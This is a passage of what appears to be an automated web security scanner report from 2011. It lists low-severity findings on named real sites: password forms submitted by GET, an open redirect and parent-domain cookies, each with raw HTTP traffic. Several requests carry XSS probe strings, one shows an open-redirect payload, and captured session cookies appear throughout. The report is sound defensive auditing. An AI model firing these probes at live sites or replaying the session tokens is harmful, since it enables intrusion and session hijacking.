User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...

13.2. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

13.3. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

13.4. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td><form action="#" onsubmit="f_input(this); return false;" >';
       str+='E-mail:<br>
...[SNIP]...
<br><input name="pass" type="password" value="" size=20 onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

13.5. http://my.webalta.ru/public/engine/templates.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.webalta.ru
Path:   /public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /public/engine/templates.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';        
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

14. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a7d7bab4fd77ae98a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0?test-tag=17073164&.a7d7bab4fd77ae98a/=1 HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:35:17 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:35:17 GMT
Expires: Mon, 25 Apr 2011 14:35:17 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.iveco-ptc.spb.ru?.a7d7bab4fd77ae98a/=1&_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
Content-Length: 0


15. Cookie scoped to parent domain  previous  next
There are 97 instances of this issue:


15.1. http://www.gartner.com/technology/contact/contact_gartner.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/contact/contact_gartner.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/contact/contact_gartner.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=nMx8N1kBgpd2v7XKWLb9qTL1ySyvfknTRk77TT2XbtpNyfyvrwqk!-1168810344; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:14 GMT
ETag: "pv99785f693982e6484f97f558a3076f92"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A151087.RA0.G24F28.U2C9A436D].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8; Path=/
Content-Length: 16560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>


<head>


<!-- Changes to title and meta tags
...[SNIP]...

15.2. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...

15.3. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*fBMrAvrgzc*LGZun_NH9cMDXDoMMI8GiBUBHw==*,5*4db58744*bwSz6lRck8*TLWvV9Mp1Su71GX8*ACWaeyU=; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

15.4. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=97383008780889220&clkurl=http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAkxzWVwAAAAA./cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU./referrer=http%3A%2F%2Fwww.livejournal.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...

15.5. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6sn9=dlx%3A6ot5%3A1; rth=2-ljzkpb-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:01 GMT
Connection: close
Set-Cookie: T_6sn9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.6. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:11 GMT
Connection: close
Set-Cookie: T_9xbg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

15.7. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303741228.986,wait-%3E10000,&1303741240885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:25 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

15.8. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
